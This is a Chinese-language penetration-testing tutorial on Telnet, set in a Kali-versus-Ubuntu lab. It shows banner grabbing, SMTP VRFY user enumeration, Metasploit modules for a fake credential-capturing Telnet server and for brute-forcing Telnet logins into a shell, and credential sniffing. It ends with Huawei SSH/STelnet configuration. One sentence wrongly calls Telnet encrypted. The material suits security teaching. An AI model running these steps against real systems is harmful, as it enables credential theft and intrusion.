环境
Telnet 服务器:Ubuntu
攻击者系统:Kali Linux
目录
- 安装和配置
- 连接到 Telnet
- Telnet 的 Banner 抓取
- 通过 Telnet 抓取横幅
- 中间人攻击(MITM):Telnet 欺骗
- 暴力破解
- Telnet 凭证嗅探
安装和配置
Telnet 是一种未加密的协议,因此不安全。由于 Telnet 是一种加密协议,我们建议使用 SSH 而不是 Telnet。不过,您仍然应该了解所有协议,而 Telnet 是用于连接到本地网络中其他系统的协议之一。那么,让我们先开始安装。Telnet 服务器的安装非常简单。
在 Ubuntu 中使用 root 权限运行以下命令来安装 Telnet。
apt-get install telnetd
systemctl staus inetd
从 Windows 机器测试 Telnet 连接
现在我们将使用 Putty 连接 telnet。输入 Ubuntu 的 IP 地址并提供端口 23 以便连接 telnet,然后点击“打开”。
连接到 Telnet
telnet 已安装完毕。现在是时候连接远程 Telnet 服务器了。登录你的 Kali 计算机并运行以下命令。连接时,系统会要求输入用户名和密码,输入正确的值后,即可连接。
telnet 192.168.0.196
Telnet 的 Banner 抓取
现在,一旦 telnet 的设置准备好,我们将运行版本扫描以了解 Ubuntu 中正在运行哪个版本,如下面的屏幕截图所示,我们通过此扫描获得了版本。
通过 Telnet 抓取横幅
在目标网络上运行的其他系统的旗帜捕获中,Telnet 发挥着重要作用。
要查找目标计算机上运行的SSH服务的版本,请按照以下指令在 Kali Linux 中打开终端。
telnet 192.168.0.196
类似地, SMTP服务器的版本和合法用户也可以与 telnet 关联。运行以下命令,查看其版本和当前用户。
telnet 192.168.0.196 25
您将从图片中注意到“220 metasploitable.localdomain ESMTP Postfix”已成功安装在目标计算机上。
如果您收到答案代码 550,则表示用户帐户未知:您可以通过以下命令猜测合法用户帐户:
vrfy msfadmin
如果收到了消息代码250、251、252,则表示服务器确认应用程序和用户帐户正确。
如果您收到短信代码550,则表示该账户无效,如图所示。
中间人攻击(MITM):Telnet 欺骗
攻击可能会使用 telnet 欺骗作为中间人攻击来捕获 telnet 登录凭证。
这可以通过在网络中生成一个伪造的 telnet 服务来实现。在 Kali Linux 中打开终端并加载 Metasploit 框架;现在输入以下命令启动服务器,这里我们还提供了一个“欢迎使用 Hacking Articles”的横幅,您可以自行设置。
use auxiliary/server/capture/telnet
set srvhost 192.168.0.102
set banner Welcome to Hacking Articles
exploit
现在,一旦攻击者发现 telnet 正在受害者的系统中运行,他就会尝试连接,并且为了连接,他提交了凭据,但登录失败。
但是我们可以在服务器中看到我们的日志,它代表了谁尝试通过 telnet 连接。
暴力破解
攻击者仍在尝试使用暴力破解来窃取凭证。该模块会检查 Telnet 登录信息,并记录各种设备上的正常连接。
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set rhosts 192.168.0.196
msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt
msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(telnet_login) > set stop_on_success true
msf auxiliary(telnet_login) > exploit
正如您所看到的,它在这里获得了 telnet 的有效凭证,并为受害者的 shell 提供了会话。
sessions –u 2
一旦我们获得受害者的 meterpreter,我们将执行 sysinfo 命令来检查我们是否在 Ubuntu 机器上。
Telnet 凭证嗅探
默认情况下,Telnet 不会加密所有链接数据,甚至包括密码,因此总是有可能窃听通信,然后将密码用于恶意用途;在 Telnet 使用的两个主机之间具有网络访问权限的人可以中断源和目标之间的数据包,并获取身份验证、密码和数据详细信息。
从下图中,您可以读取 Telnet 的用户名:raj 和密码:123,此外还可以读取通过数据包在源和目的地之间传输的完整信息。
由于 Telnet 实现不支持传输层安全性 (TLS) 和简单身份验证和安全层 (SASL) 身份验证扩展。因此,建议使用 1995 年首次发布的安全外壳 (SSH) 协议来替代 Telnet。也就是我们所说的STelnet,这就是为什么说telnet不是个安全可靠的协议。
一、配置vty线路
#
user-interface con 0
authentication-mode aaa
user-interface vty 0 4
authentication-mode aaa
protocol inbound ssh
user-interface vty 16 20
#
二、配置aaa
[FW1]aaa
[FW1-aaa]manager-user test
[FW1-aaa-manager-user-test]password cipher Huawei@123
Info: You are advised to config on man-machine mode.
[FW1-aaa-manager-user-test]service-type ssh
[FW1-aaa-manager-user-test]level 15
[FW1-aaa-manager-user-test]quit
三、创建ssh用户和服务
[FW1]ssh user test
Info: Succeeded in adding a new SSH user.
[FW1]ssh user test authentication-type password
[FW1]ssh user test service-type stelnet
[FW1]quit
四、全局启用stelnet服务
[FW1]stelnet server enable
Info: Succeeded in starting the Stelnet server.
五、生成本地RSA主机密钥对和服务器密钥对
[FW1]rsa local-key-pair create
The key name will be: FW1_Host
The range of public key size is (2048 ~ 2048).
NOTES: If the key modulus is greater than 512,
it will take a few minutes.
Input the bits in the modulus[default = 2048]:
Generating keys...
..+++++
........................++
....++++
...........++
注:ssh authentication-type default password`命令为用户配置SSH认证缺省采用密码认证,在用户数量比较多时,对用户使用缺省密码认证方式可以简化配置,此时只需再配置AAA用户即可。
原文始发于微信公众号(三沐数安):Telnet 渗透测试(端口 23)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论